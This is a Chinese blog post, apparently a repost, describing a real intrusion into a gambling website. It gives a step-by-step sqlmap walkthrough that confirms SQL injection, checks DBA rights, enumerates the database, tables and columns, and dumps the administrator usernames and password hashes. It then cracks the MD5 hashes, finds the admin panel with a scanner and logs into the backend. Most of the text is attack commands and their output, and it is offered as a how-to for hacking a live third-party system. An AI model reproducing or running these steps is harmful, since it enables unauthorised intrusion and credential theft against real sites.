实战入侵某赌博网

颓废 2019年5月19日10:35:01评论789 views字数 900阅读3分0秒阅读模式
摘要

Sqlmap..py -u http://www.xxxx.com/History?id=xxx 从上图可以看到是存在注入点的。

目标操作系统是Windows 2008 R2 or 7,网站脚本是ASP.NET,容器是IIS 7.5

那么我们看看他是否是管理员权限:

Sqlmap.py -u http://www.xxxx.com/History?id=xxx --is-dba

注入脚本找到了一个注入点:

http://www.xxxx.com/History?id=xxx

我们就用Sqlmap来跑:

Sqlmap..py -u http://www.xxxx.com/History?id=xxx

实战入侵某赌博网

从上图可以看到是存在注入点的。

目标操作系统是Windows 2008 R2 or 7,网站脚本是ASP.NET,容器是IIS 7.5

那么我们看看他是否是管理员权限:

Sqlmap.py -u http://www.xxxx.com/History?id=xxx --is-dba
实战入侵某赌博网

[19:11:01] [INFO] resumed: root@localhost

current user is DBA:    True

返回值是True,是一个管理员权限

 

那么我们直接去跑数据库下的表吧:

Sqlmap.py -u http://www.xxxx.com/History?id=xxx --current-db

解释:--current-db是指爆当前所用的数据库
实战入侵某赌博网

我们继续跑数据库下的表:

sqlmap.py -u http://www.xxxx.com/History?id=xxx -D xxx_cc --tables

-D是指数据库 --tables是指表名
实战入侵某赌博网

然后我们找关键字:admin,user,admin_user...等等

继续爆cz_admin表下的列:

sqlmap.py -u http://www.xxxx.com/History?id=xxx -D xxx_cc -T cz_admin --columns

解释:-T是指表名 --columns是指爆表下的列
实战入侵某赌博网

可以看到关键字:admin_pwd和admin_username

我们就可以用:

sqlmap.py -u http://www.xxxx.com/History?id=xxx -D xxx_cc -T cz_admin -C admin_pwd,admin_username --dump

解释:-C是列举admin表下的admin_pwd和admin_username,--dump是指把他们爆出来
实战入侵某赌博网

这样就拿到了管理员的哈希 接着把MD5拿去解密:直接md5解密

解密成功,神器御剑扫后台:

实战入侵某赌博网

之后直接x入后台

实战入侵某赌博网

马赛克不解释

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日10:35:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实战入侵某赌博网https://cn-sec.com/archives/68530.html

发表评论

匿名网友 填写信息